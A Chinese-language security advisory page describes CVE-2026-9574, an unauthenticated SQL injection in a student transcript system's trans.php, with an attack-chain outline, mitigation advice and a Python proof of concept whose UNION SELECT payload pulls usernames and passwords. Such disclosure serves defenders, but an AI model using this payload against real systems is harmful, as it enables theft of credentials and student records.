IPBUF安全漏洞报告
English
CVE-2026-9574 CVSS 7.3 高危

CVE-2026-9574: Student Transcript Processing System SQL注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9574
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Student Transcript Processing System

相关标签

SQL注入CVE-2026-9574itsourcecode远程代码执行无需认证Web安全

漏洞概述

itsourcecode Student Transcript Processing System 1.0版本被发现存在SQL注入漏洞。该漏洞位于/admin/modules/student/trans.php文件中,由于对参数studentId和cid的处理不当导致。攻击者无需用户认证即可远程发起攻击,通过操纵参数执行恶意SQL语句,可能导致敏感数据泄露或数据库被非法控制。

技术细节

该漏洞的根本原因在于应用程序在构建数据库查询时,未能对用户提交的`studentId`和`cid`参数进行充分的输入验证和转义。在`/admin/modules/student/trans.php`处理逻辑中,这些参数被直接拼接到了SQL查询语句中,从而创造了SQL注入的条件。由于CVSS向量显示无需认证(PR:N),攻击者可以通过互联网直接向受影响端点发送特制的HTTP请求。利用方式包括但不限于基于布尔的盲注、联合查询注入或时间延迟注入,以此绕过应用逻辑,读取数据库中的学生成绩、用户凭证或其他敏感信息。

攻击链分析

STEP 1
侦察阶段
攻击者使用网络扫描工具识别出互联网上运行itsourcecode Student Transcript Processing System 1.0的目标服务器。
STEP 2
漏洞探测
攻击者向目标服务器发送测试请求,定位存在漏洞的页面/admin/modules/student/trans.php,并确认参数studentId和cid未经过滤。
STEP 3
攻击利用
攻击者构造包含恶意SQL代码的Payload(如UNION SELECT语句),通过HTTP请求发送注入点参数,欺骗后端数据库执行非授权命令。
STEP 4
数据窃取
数据库执行恶意查询后,将查询结果(如管理员密码哈希、学生个人信息)嵌入到HTTP响应中返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://vulnerable-host/admin/modules/student/trans.php" # SQL Injection Payload Testing # Using studentId parameter as the injection point payload_params = { "studentId": "1' UNION SELECT NULL, NULL, username, password FROM users-- -", "cid": "1" } try: # Send the malicious request response = requests.get(target_url, params=payload_params, timeout=10) # Analyze response if "admin" in response.text: print("[+] Potential SQL Injection vulnerability confirmed.") print(f"[+] Response length: {len(response.text)}") else: print("[-] Vulnerability not detected or payload adjusted needed.") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

itsourcecode Student Transcript Processing System 1.0

防御指南

临时缓解措施
如果无法立即修补,建议在Web服务器层面对/admin/modules/student/trans.php路径实施IP白名单访问控制,或暂时禁用该模块功能。同时,应检查数据库日志以确认是否已有数据被异常访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表